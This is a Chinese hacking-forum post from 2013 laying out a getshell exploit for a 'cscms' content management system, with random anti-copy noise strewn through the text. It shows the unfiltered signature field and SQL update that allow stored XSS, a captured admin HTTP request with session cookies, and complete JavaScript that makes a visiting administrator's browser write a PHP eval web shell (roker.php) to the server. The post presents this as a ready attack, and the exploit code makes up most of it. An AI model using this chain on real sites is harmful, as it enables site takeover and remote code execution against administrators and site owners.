|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
/ s) r7 E: G. l官网已经修补了,所以重新下了源码
4 r* s/ f7 b8 h( e# t因为 后台登入 还需要认证码 所以 注入就没看了。
7 Y8 {1 H# b! o% i存在 xss
+ e* \# d% H& T! \6 e漏洞文件 user/member/skin_edit.php
/ F& \8 Y2 ?! C/ M. Y1 ^5 Y本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:! c3 I) U% ?# ^
% v& D; o; u* X: O! k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>& y! H& U* l: p$ h4 r' [
; g$ J; b" e# V' t1 T- {6 L
</textarea></td></tr>1 A8 e4 \; U" E
* R! d( f& p! Q user/do.php 7 K. ? I# q# V9 K& J3 ~( p, ]
/ r# \/ L/ m' y% N3 O5 S" d
. X/ T8 e: |1 t/ Sif($op=='zl'){ //资料6 b' ^, A8 J1 P G
! W' `7 g# d, X) i if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
% @) ?, }) @6 | exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));* ~5 g$ {( P3 @6 [4 m
* _! o4 c$ M. t9 N $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
% g; O. v" O+ K% ~+ l) o4 Y" F
7 U J. Y( R3 P5 _" A CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. d1 @! b# E% f) t8 W5 Q where CS_Name='".$cscms_name."'";0 C& g2 f* S- v- Z, ?& }
. C# ]2 E# @3 z' G9 c" F$ k
if($db->query($sql)){+ Q. [3 h( }- V: G
- e1 W. p& T% I H' }; ]1 r
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));% C4 ~8 ?: D; H: @% d9 }: Y! T! ^
6 I3 O1 ~2 i7 ?. k0 e }else{
& D$ |% H+ x7 H- O# C5 H$ N: ` 8 [* g/ I4 l$ p2 I6 K8 B
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
* I8 P p9 n2 h" l* E ( A2 c& P" q5 U! S9 c# s
}# ?; T3 K/ R1 F" s( N9 S
E9 [4 |& k) j7 Z J# K8 c, d
* a3 F3 B- d% ^9 v没有 过滤导致xss产生。; e" [* I! |6 a) M) I( f4 z* h
后台 看了下 很奇葩的是可以写任意格式文件。。2 _! H; e! l' F" z. K
抓包。。
, @" s* `* j0 Y' \ n `( T
7 e4 I8 V0 J' t6 d0 \$ I/ e- J+ P4 [4 G( G
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
. F) U1 A2 f% N* O* _7 N0 Q
9 G8 m6 ^ Q* F* `3 p. k: i6 YAccept: text/html, application/xhtml+xml, */*; i/ |2 m$ z, I) f
7 t- H/ O3 R( a. a# |5 H# x+ oReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
7 O% y8 @' R, c( ^9 A4 D
. p3 T* i5 N m4 LAccept-Language: zh-CN
7 ~9 \% p: }% Q/ L
$ V; `$ k; ~+ E" EUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)0 I" Q3 ?2 [3 Q' V/ }
2 t* Q0 @* a2 U! e
Content-Type: application/x-www-form-urlencoded! P( w" r- C& x, o# K. X
0 U) F* [8 W5 @; y l( b& @! UAccept-Encoding: gzip, deflate
M( ]1 }' h- S* L* U, C2 l D$ T6 R. b% h) b: B# j8 @' n
Host: 127.0.0.1
! o! m, l. E8 N1 {' x# D/ k
% e5 p' K& T- p: FContent-Length: 38. Y9 W8 h5 L l! P
' y3 @% g" Y* J5 r* T6 C" \% UDNT: 1$ Y$ _- ]$ p" M
6 Q( p+ a0 q2 |+ Z- t
Connection: Keep-Alive5 E3 l/ i3 R. Y* V. S/ T
9 a) b4 b% t5 S; y7 y
Cache-Control: no-cache
( W( l4 P* H0 B, O. w $ K6 l# T4 v- w0 @7 }1 ~8 u4 P
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 P) {+ p% U% q j6 R
' v0 J" ?% O. [! u" s
5 p5 X1 _; u, q6 m
name=aaa.php&content=%3Cs%3E%3Ca%25%3E4 }) ^, V3 L9 q. E3 A$ Z% R
/ o: ~/ T1 o& G& k& F5 m8 e! ^
! d1 x0 e& {# [4 X( H# f& I x8 ]+ t/ v; Y
于是 构造js如下。
% |5 U) m: k" i ]4 v! z9 S1 M
" p# z6 U4 `! F% q# _# q1 d& B本帖隐藏的内容<script> 2 X3 |. L, v3 w/ {, |) T! _& L z+ h
thisTHost = top.location.hostname;
9 L/ ]; ?5 D9 r. M
, i( t) w% Q& x% ^4 w3 r. i- B& d$ YthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
: S& b1 v+ F0 K
) Y7 S" U0 b( v6 }+ d" Gfunction PostSubmit(url, data, msg) {
( G( }3 A4 T( u" H- c var postUrl = url;3 K1 Q, p0 ^! D& H6 w
& p. z: {4 `, |% C7 ` var postData = data; , m3 ]( {2 {/ q# f9 b
var msgData = msg; " K: h* v' W2 l5 ~ @
var ExportForm = document.createElement("FORM");
4 f! T7 t; H" i9 o document.body.appendChild(ExportForm);
+ u! o2 I' J( I ExportForm.method = "POST"; * q) Z* m2 ^7 |
var newElement = document.createElement("input");
; c; g+ M5 d5 k8 ]1 f! o- G newElement.setAttribute("name", "name");
" `+ j' i1 ?/ [4 x8 X1 |# S/ W s newElement.setAttribute("type", "hidden"); ; f6 G+ {$ s: |% Z. e" N- x
var newElement2 = document.createElement("input"); % K* S% f4 t' |; K; Z' d$ j
newElement2.setAttribute("name", "content");
6 x+ }5 k7 z6 r+ h5 ` newElement2.setAttribute("type", "hidden"); ) O6 g4 ?- M X6 ?
ExportForm.appendChild(newElement); # d/ G' L8 K, G5 E; H
ExportForm.appendChild(newElement2); ; }' u2 P) g) i( X
newElement.value = postData;
0 [* Z/ G% V5 y+ t# A b newElement2.value = msgData; # G0 M) \+ K2 h3 v
ExportForm.action = postUrl; : }: P' ~4 K( H- r$ W2 Q
ExportForm.submit();
& _2 q* g& h! p- z9 U};7 { Q4 t; z3 _
0 W( |$ O+ V8 P6 \: E" O# M8 W
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
5 R- @6 F9 E2 ? 0 t6 O2 x/ j- G+ ]3 `! X
</script>
9 S0 s1 e6 l1 A+ A2 ?' C- u) D$ m
' z7 p+ V$ X1 W' u1 w
! c2 R3 C0 t5 p" E5 Q5 T2 [! Q: ?4 b! g& @
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* R" Q! D2 d' X/ v* q用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
3 a$ E1 l- T$ i7 r3 K" a# r& f' m就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" E8 c- ~, [+ n8 j1 g- ?: u7 F4 ^5 T0 T |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对